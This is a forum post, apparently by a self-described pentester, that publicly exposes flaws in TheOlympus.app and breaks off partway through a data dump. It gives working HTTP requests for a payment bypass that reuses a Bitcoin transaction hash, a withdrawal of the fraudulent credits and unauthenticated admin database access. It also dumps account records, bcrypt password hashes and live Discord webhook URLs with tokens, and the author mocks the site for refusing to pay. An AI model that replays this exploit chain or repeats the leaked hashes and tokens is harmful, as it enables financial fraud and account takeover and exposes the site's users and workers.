greedi
Registered
- Joined
- Nov 2, 2025
- Messages
- 5
- Reaction score
- 0
- Points
- 1
# Security Assessment: TheOlympus.app - Enterprise-Grade Security Claims vs Reality
# If you are a site owner and want me to pentest your site and disclose all vulnerabilities to you dm me! → Portfolio
**Assessment Date:** November 2, 2025
## Target: TheOlympus.app
**Their Claim:** "Advanced Security - Complete your transactions securely with enterprise-grade security features including multi-factor authentication, encrypted communications, and real-time fraud protection."
**Reality:** Multiple critical vulnerabilities exposing complete financial system compromise and massive data leakage. If these devs cannot secure their own site what makes you think they will yours
**DWC!**
## CRITICAL VULNERABILITIES DISCOVERED
### 1. Payment Bypass via Transaction Hash Reuse (CRITICAL)
**Impact:** Complete financial system compromise
**Method:** `/api/payments/check` endpoint accepts old transaction hashes from unrelated Bitcoin transactions
**Proof:**
**Result:** System marks payment as "completed" with full confirmations, granting credits without actual payment
### 2. Complete Financial Exploitation Chain
### 3. Unauthenticated Admin Database Access (CRITICAL)
### 4. Massive Data Exposure
**Exposed Data:**
- 93 unique user accounts with emails
- 34 worker accounts with bcrypt password hashes
- 5 active Discord webhook URLs
- User credit balances and transaction details
- Discord/Telegram integration details
## 💢 DATA BREACH
↓10X Workers↓
↓DUMP↓
## 🛡️SPECIFIC SECURITY FAILURES
### Authentication System
- **Claim:** Multi-factor authentication
- **Reality:** No authentication on critical admin endpoints
- **Evidence:** `/api/admin/*` endpoints return 200 OK unauthenticated
### Fraud Protection
- **Claim:** Real-time fraud protection
- **Reality:** Payment system accepts any valid Bitcoin transaction hash
- **Evidence:** Reused hash `1ef675816d9888d053bc627be4de1f700622d93c07e27bcaa61b713ab444b2ee` marked as completed
### Data Protection
- **Claim:** Encrypted communications
- **Reality:** Complete database exposure via unauthenticated API calls
- **Evidence:** All user data, payment history, and worker credentials accessible
## 🔧 TECHNICAL DETAILS
**Infrastructure:** Cloudflare CDN (172.67.145.243)
**Database:** MongoDB (ObjectID structure confirmed)
**Authentication:** JWT HS256 tokens
**Vulnerable Endpoints:**
- `/api/payments/check` - Payment validation
- `/api/admin/payments` - Payment database
- `/api/admin/workers` - Worker accounts
- `/api/withdrawals/request` - Withdrawal processing
## ABOUT THIS ASSESSMENT
**Conducted by:** Greedi → Portfolio
**Methodology:** penetration testing using Burp Suite, directory enumeration, manual vulnerability testing
**Focus:** IDOR, SQL injection, CSRF, XSS, payment callback manipulation, authentication bypass
## 📋 EVIDENCE
Full technical report available with:
- API request/response captures
- Vulnerability reproduction steps
- Timeline of exploitation
- ↓Submit withdrawal request with fraudulent credits↓
*This assessment was conducted ethically and reported to the platform before public disclosure.* (decided not to pay $350 for these vulns lmfao)
# If you are a site owner and want me to pentest your site and disclose all vulnerabilities to you dm me! → Portfolio
**Assessment Date:** November 2, 2025
## Target: TheOlympus.app
**Their Claim:** "Advanced Security - Complete your transactions securely with enterprise-grade security features including multi-factor authentication, encrypted communications, and real-time fraud protection."
**Reality:** Multiple critical vulnerabilities exposing complete financial system compromise and massive data leakage. If these devs cannot secure their own site what makes you think they will yours
**DWC!**
## CRITICAL VULNERABILITIES DISCOVERED
### 1. Payment Bypass via Transaction Hash Reuse (CRITICAL)
**Impact:** Complete financial system compromise
**Method:** `/api/payments/check` endpoint accepts old transaction hashes from unrelated Bitcoin transactions
**Proof:**
Bash:
### Payment Bypass Exploitation
**Request:**
```http
POST /api/payments/check HTTP/1.1
Host: theolympus.app
Content-Type: application/json
Authorization: Bearer [JWT_TOKEN]
Content-Length: 123
{
"orderId": "[GENERATED_ORDER_ID]",
"txHash": "1ef675816d9888d053bc627be4de1f700622d93c07e27bcaa61b713ab444b2ee"
}
```
**Response:**
```json
{
"success": true,
"payment": {
"_id": "[PAYMENT_ID]",
"orderId": "[GENERATED_ORDER_ID]",
"status": "completed",
"amount": 100,
"creditAmount": 100,
"paymentData": {
"tx_hash": "1ef675816d9888d053bc627be4de1f700622d93c07e27bcaa61b713ab444b2ee",
"confirmations": 544,
"required_confirmations": 1
},
"completedAt": "2025-11-02T15:25:08.753Z"
}
}
**Note:** Transaction hash `1ef675816d9888d053bc627be4de1f700622d93c07e27bcaa61b713ab444b2ee` was from an unrelated Bitcoin transaction from phthonos's payment history.
System accepted it and marked payment as completed with 544 confirmations, granting $100 in credits without actual payment.### 2. Complete Financial Exploitation Chain
Bash:
### Withdrawal Request with Fraudulent Credits
**Request:**
```http
POST /api/withdrawals/request HTTP/1.1
Host: theolympus.app
Content-Type: application/json
Authorization: Bearer [JWT_TOKEN]
Content-Length: 102
{
"amount": 50,
"crypto": "btc",
"paymentMethod": "btc",
"paymentDetails": "bc1q0dx66c6qypzz8vdt6ar90ltfd8xrrnseg89l8d"
}
```
**Response:**
```json
{
"success": true,
"withdrawal": {
"_id": "69077e47df38d72a1dc17707",
"amount": 50,
"crypto": "btc",
"status": "pending",
"paymentDetails": "bc1q0dx66c6qypzz8vdt6ar90ltfd8xrrnseg89l8d",
"createdAt": "2025-11-02T[timestamp]",
"userId": "[USER_ID]"
},
"message": "Withdrawal request submitted successfully"
}
```
**Attack Chain:**
1. Payment bypass via reused hash → Credits granted: $100
2. Withdrawal request submitted → $50 withdrawal ID created: `69077e47df38d72a1dc17707`
3. Complete financial exploitation chain demonstrated### 3. Unauthenticated Admin Database Access (CRITICAL)
Bash:
### Unauthenticated Admin Endpoint Access
**Request:**
```http
GET /api/admin/payments?page=1 HTTP/1.1
Host: theolympus.app
Accept: application/json
```
**Response:**
```json
{
"payments": [
{
"_id": "[PAYMENT_ID]",
"orderId": "[ORDER_ID]",
"userId": {
"_id": "690777b1df38d72a1dc15965",
"username": "phthonos",
"email": "[email protected]"
},
"amount": 100,
"creditAmount": 100,
"status": "completed",
"paymentData": {
"tx_hash": "1ef675816d9888d053bc627be4de1f700622d93c07e27bcaa61b713ab444b2ee",
"confirmations": 544
},
"createdAt": "2025-11-02T15:25:08.753Z"
}
// ... 127 more payment records
],
"totalPages": 13,
"currentPage": 1,
"totalPayments": 128
}
```
**Note:** Endpoint returns 200 OK without any authentication headers.
Full payment database accessible including user emails, transaction hashes, and payment amounts.### 4. Massive Data Exposure
**Exposed Data:**
- 93 unique user accounts with emails
- 34 worker accounts with bcrypt password hashes
- 5 active Discord webhook URLs
- User credit balances and transaction details
- Discord/Telegram integration details
## 💢 DATA BREACH
↓10X Workers↓
| Worker ID | Username | Password Hash | Role | Subroles | Credits | Webhook | Payments | Discord ID | |
| 67a0c18e | Amy | [email protected] | $2a$10$gSMCkP0R/C0m2o97zXPpwutHdg8DbhPoA1SpJ/ejuw4Dr4FnfWCpi | worker | coding, website-development, discord-setups | $0.00 | discord.com/api/webhooks/1203494402794717295/mJ-9zbLnNDyejbz9WlABrKDfLXu0emME1jq2ipy8RwrL7-3xvnYuDQly0c_p-K0XGGxR | 0 | 0 |
| 67a0c237 | gela | [email protected] | $2a$10$yX9ynGZoiMBmOIIMeUAjL.Dq14tWiRpSS8/heSjaUoQebiooj.vXK | worker | coding, website-development, discord-setups, google-sheets | $0.00 | 0 | 1294423062233481327 | |
67a0c59c | volume | [email protected] | $2a$10$QM/xuOKvt7nBTlZ8sSE9NuiEsvv8zi0M8gljn.zIOMXnw2uFfugiy | worker | design, coding, website-development | $0.00 | 0 | 0 | |
| 67a0d3f6 | trix | [email protected] | $2a$10$Bkz9Tm0In0.rOyPOn2S/2.Q95Q0MVC2vkiairwNeOcq5UyJsUyIc2 | worker | design, coding, website-development, discord-setups | $0.00 | 0 | 0 | |
| 67a0d624 | prince | [email protected] | $2a$10$XvbfUaZHcjegSTRE09.l/uymTHTiXFFaZVL8DLMSIEB8deTfwnUcC | worker | design, coding, website-development | $0.00 | 0 | 1277287815578648649 | |
| 67d20db6 | jstonedev | [email protected] | $2a$10$hy9qOK/K0bTySGtmb5r5uOIsXueV35Ie4gX5Qyb7bYS/ooKYKAiti | worker | website-development, coding, design | $0.00 | 0 | 0 | |
| 67a0c0ef | Hades | [email protected] | $2a$10$W6naZviJx//h6R3rYFZqj.m1Xb0tDSPFKcRqPRo5wPzxFNNxrJrNK | worker | design | $0.00 | 0 | 0 | 0 |
67a471fd | devlujia | [email protected] | $2a$10$HVc0qywjjL44AYs27g68q.TD24Yn8GlhPqX9ycBN1br7GDVIsgszG | worker | support, design, coding, website-development, discord-setups, google-sheets | $0.00 | 0 | 0 | 0 |
| 69019886 | artisan | [email protected] | $2a$10$NNz.WfUFoSEyp4JvaWddZeikGm2AIEtkcKil4AOAYRAYeFl1Zvo6u | worker | design, coding, website-development | $0.00 | 0 | 0 | 762324323012575284 |
↓DUMP↓
JSON:
{
"statistics": {
"total_workers": 34,
"total_payments": 128,
"unique_users": 59,
"leaderboard_entries": 3,
"total_payment_amount": 40992.55,
"completed_payments": 57,
"pending_payments": 30
},
"tables": {
"users": [
{
"_id": "67c3547dca14a31e585fd2cd",
"username": "ryzen",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 25000.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67c3547dca14a31e585fd2cd"
},
{
"_id": "67f3b40a9ef244ff5960e360",
"username": "jaimechance1994",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 4000.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67f3b40a9ef244ff5960e360"
},
{
"_id": "68f7af27df38d72a1d776516",
"username": "px01z",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 4.0,
"total_paid": 807.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68f7af27df38d72a1d776516"
},
{
"_id": "67d57c257e983b3c0adc2e0b",
"username": "halo06",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 4.0,
"total_paid": 655.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67d57c257e983b3c0adc2e0b"
},
{
"_id": "68b7ae4e368ea255e9993bfd",
"username": "jeremybanks11",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 610.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68b7ae4e368ea255e9993bfd"
},
{
"_id": "68286e09368ea255e9d93208",
"username": "memezy",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 609.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68286e09368ea255e9d93208"
},
{
"_id": "67b4b215c19b44a1cb6f6731",
"username": "koko",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 600.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b4b215c19b44a1cb6f6731"
},
{
"_id": "6825acac368ea255e9c7b649",
"username": "black",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 500.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "6825acac368ea255e9c7b649"
},
{
"_id": "68775503368ea255e9905853",
"username": "gr88pe",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 5.0,
"total_paid": 469.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68775503368ea255e9905853"
},
{
"_id": "67b224c8c19b44a1cb559590",
"username": "user1337",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 465.37,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b224c8c19b44a1cb559590"
},
{
"_id": "67a0be31facae7004ec1094c",
"username": "Winter",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 11.0,
"total_paid": 438.54,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0be31facae7004ec1094c"
},
{
"_id": "68f3aa4edf38d72a1d689669",
"username": "vintage",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 3.0,
"total_paid": 382.65,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68f3aa4edf38d72a1d689669"
},
{
"_id": "67a66d3fe6797eea520c0830",
"username": "ghalepaiin",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 7.0,
"total_paid": 350.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a66d3fe6797eea520c0830"
},
{
"_id": "67fe547f9ef244ff59c29520",
"username": "rish",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 345.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67fe547f9ef244ff59c29520"
},
{
"_id": "67d99eea5dac3d40053bf19c",
"username": "pascaro",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 3.0,
"total_paid": 330.4,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67d99eea5dac3d40053bf19c"
},
{
"_id": "681ba1e7368ea255e973de5e",
"username": "unixiv",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 312.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "681ba1e7368ea255e973de5e"
},
{
"_id": "67ab038e5de10962fc77cf35",
"username": "kadev",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 4.0,
"total_paid": 310.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67ab038e5de10962fc77cf35"
},
{
"_id": "67b75f8bf6ed06531ea5f872",
"username": "rival",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 270.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b75f8bf6ed06531ea5f872"
},
{
"_id": "67fc5f219ef244ff59ad1caf",
"username": "ivorytowerref",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 250.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67fc5f219ef244ff59ad1caf"
},
{
"_id": "68d7d367df38d72a1df261c5",
"username": "yersteri",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 240.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68d7d367df38d72a1df261c5"
},
{
"_id": "67ff5e8c9ef244ff59ce2830",
"username": "customertest",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 12.0,
"total_paid": 212.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67ff5e8c9ef244ff59ce2830"
},
{
"_id": "67a0d7992d53a9df940b3e7a",
"username": "bongang101101",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 205.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0d7992d53a9df940b3e7a"
},
{
"_id": "68c981b0c2ae1e7199f72e3f",
"username": "biibobio",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 200.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68c981b0c2ae1e7199f72e3f"
},
{
"_id": "682a235a368ea255e9e6ee04",
"username": "dasd",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 200.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "682a235a368ea255e9e6ee04"
},
{
"_id": "67e0c7925dac3d40057016f4",
"username": "wongyithong",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 200.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67e0c7925dac3d40057016f4"
},
{
"_id": "68608633368ea255e917f5ce",
"username": "the_one",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 3.0,
"total_paid": 171.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68608633368ea255e917f5ce"
},
{
"_id": "67a766e51404db58932a053a",
"username": "indo",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 158.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a766e51404db58932a053a"
},
{
"_id": "67afaa9271d0a7300ca7446d",
"username": "wqoke",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 156.29,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67afaa9271d0a7300ca7446d"
},
{
"_id": "67b1f73dba297a0a5f96e2d3",
"username": "holygus",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 155.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b1f73dba297a0a5f96e2d3"
},
{
"_id": "68eb622ddf38d72a1d4ce588",
"username": "vexn",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 145.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "68eb622ddf38d72a1d4ce588"
},
{
"_id": "688ec862368ea255e9ce1f31",
"username": "anafranksly",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 120.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "688ec862368ea255e9ce1f31"
},
{
"_id": "67a0be82facae7004ec1095a",
"username": "lujia",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 120.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0be82facae7004ec1095a"
},
{
"_id": "67b12dfaba297a0a5f91e1d2",
"username": "garen1773",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 16.4,
"payment_count": 1.0,
"total_paid": 120.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b12dfaba297a0a5f91e1d2",
"status": "offline"
},
{
"_id": "67a41831aac7b55cf62f3e5b",
"username": "lucyfius",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 110.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a41831aac7b55cf62f3e5b"
},
{
"_id": "690777b1df38d72a1dc15965",
"username": "phthonos",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 105.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "690777b1df38d72a1dc15965"
},
{
"_id": "67e95d679ef244ff5916ef3b",
"username": "zenbot",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 105.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67e95d679ef244ff5916ef3b"
},
{
"_id": "67b1d4ffba297a0a5f9509bf",
"username": "cube",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 105.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b1d4ffba297a0a5f9509bf"
},
{
"_id": "67aac24f1404db589330f0f4",
"username": "snapchat",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 103.09,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67aac24f1404db589330f0f4"
},
{
"_id": "67a1db24a95a09bc7d4f376d",
"username": "keiin",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 103.09,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a1db24a95a09bc7d4f376d"
},
{
"_id": "6849fa35368ea255e9afd6e3",
"username": "sackboy21",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 102.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "6849fa35368ea255e9afd6e3"
},
{
"_id": "67adffa65de10962fc7b6df8",
"username": "hollis",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 101.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67adffa65de10962fc7b6df8"
},
{
"_id": "6834f250368ea255e9390b43",
"username": "none",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 100.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "6834f250368ea255e9390b43"
},
{
"_id": "67a0cd2e2d53a9df940b210a",
"username": "customer",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 100.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0cd2e2d53a9df940b210a"
},
{
"_id": "67c6405c014ba6aee91394d8",
"username": "nuke",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 17.0,
"payment_count": 1.0,
"total_paid": 100.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67c6405c014ba6aee91394d8",
"status": "offline"
},
{
"_id": "67a0bea7facae7004ec10966",
"username": "Summer",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 100.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0bea7facae7004ec10966"
},
{
"_id": "688edd3c368ea255e9cf5a4e",
"username": "shawngga",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 85.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "688edd3c368ea255e9cf5a4e"
},
{
"_id": "682ca4a8368ea255e90474d4",
"username": "rosaliefdy",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 84.21,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "682ca4a8368ea255e90474d4"
},
{
"_id": "67a8cbce1404db58932d5d52",
"username": "niels",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 64.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a8cbce1404db58932d5d52"
},
{
"_id": "688fbfb3368ea255e9d60b87",
"username": "swarm",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 62.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "688fbfb3368ea255e9d60b87"
},
{
"_id": "6837c933368ea255e950e4e6",
"username": "diddler",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 3.0,
"total_paid": 61.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "6837c933368ea255e950e4e6"
},
{
"_id": "67f9ef559ef244ff599c346d",
"username": "mrorder123",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 53.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67f9ef559ef244ff599c346d"
},
{
"_id": "681ea818368ea255e9884771",
"username": "slater",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 50.0,
"payment_count": 1.0,
"total_paid": 52.63,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "681ea818368ea255e9884771",
"status": "offline"
},
{
"_id": "67f82f949ef244ff59901e1b",
"username": "weight",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 50.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67f82f949ef244ff59901e1b"
},
{
"_id": "67b1fa0aba297a0a5f971683",
"username": "leadhaven",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 47.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67b1fa0aba297a0a5f971683"
},
{
"_id": "67e759c19ef244ff59fffd1c",
"username": "ketuser",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 42.25,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67e759c19ef244ff59fffd1c"
},
{
"_id": "67c0d69fca14a31e5853faa7",
"username": "fosta",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 30.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67c0d69fca14a31e5853faa7"
},
{
"_id": "67d687917e983b3c0ae25964",
"username": "syn",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 10.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67d687917e983b3c0ae25964"
},
{
"_id": "67a0cede2d53a9df940b272a",
"username": "0volume0",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 2.0,
"total_paid": 6.03,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0cede2d53a9df940b272a"
},
{
"_id": "67acaa145de10962fc7a4acc",
"username": "helex",
"email": "[email protected]",
"password_hash": null,
"role": "user",
"credits": 0.0,
"payment_count": 1.0,
"total_paid": 5.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67acaa145de10962fc7a4acc"
}
],
"workers": [
{
"_id": "67a0c0effacae7004ec10a52",
"username": "Hades",
"email": "[email protected]",
"password_hash": "$2a$10$W6naZviJx//h6R3rYFZqj.m1Xb0tDSPFKcRqPRo5wPzxFNNxrJrNK",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0c0effacae7004ec10a52",
"subroles": [
"design"
],
"registration_date": "2025-11-02T17:05:25.955Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67a0c18efacae7004ec10a7f",
"username": "Amy",
"email": "[email protected]",
"password_hash": "$2a$10$gSMCkP0R/C0m2o97zXPpwutHdg8DbhPoA1SpJ/ejuw4Dr4FnfWCpi",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": "https://discord.com/api/webhoo...",
"webhook_url": "https://discord.com/api/webhooks/1203494402794717295/mJ-9zbLnNDyejbz9WlABrKDfLXu0emME1jq2ipy8RwrL7-3xvnYuDQly0c_p-K0XGGxR",
"user_id": "67a0c18efacae7004ec10a7f",
"subroles": [
"coding",
"website-development",
"discord-setups"
],
"registration_date": "2025-08-11T05:13:01.215Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67a0c1c0facae7004ec10a8e",
"username": "Angel_artz",
"email": "[email protected]",
"password_hash": "$2a$10$v/nbaVv0uzAoDsVM8uOukO3s4M7g3ZrkDQ2Z2RTHdTA2/DRyehkzG",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0c1c0facae7004ec10a8e",
"subroles": [
"coding",
"website-development"
],
"registration_date": "2025-11-02T17:05:25.955Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67a0c237facae7004ec10ad7",
"username": "gela",
"email": "[email protected]",
"password_hash": "$2a$10$yX9ynGZoiMBmOIIMeUAjL.Dq14tWiRpSS8/heSjaUoQebiooj.vXK",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": "1294423062233481327",
"telegram_id": "https://discord.com/api/webhoo...",
"webhook_url": null,
"user_id": "67a0c237facae7004ec10ad7",
"subroles": [
"coding",
"website-development",
"discord-setups",
"google-sheets"
],
"registration_date": "2025-02-23T03:48:01.936Z",
"referral_code": null,
"referral_earnings": 0.0,
"discord_username": "windows95ce"
},
{
"_id": "67a0c3ba4686719e87e5316c",
"username": "Propel",
"email": "[email protected]",
"password_hash": "$2a$10$/sIfU3OjtiVlTUJoeU.A8.smngzHDaMQxpTBcWXPK1HGyFKXzYlzq",
"role": "worker",
"credits": 0.0,
"payment_count": 0.0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null,
"user_id": "67a0c3ba4686719e87e5316c",
"subroles": [
"design",
"coding",
"website-development",
"discord-setups",
"google-sheets",
"support"
],
"registration_date": "2025-11-02T17:05:25.955Z",
"referral_code": null,
"referral_earnings": 0.0
},
{
"_id": "67a0c3d34686719e87e53172",
"username": "Ketchup.dev",
"email": "[email protected]",
"password_hash": "$2a$10$Wko64xOLS55Cwem6WgPUH.j...",
"role": "worker",
"credits": 0.0,
"payment_count": 0,
"total_paid": 0.0,
"discord_id": null,
"telegram_id": null,
"webhook_url": null
},
{
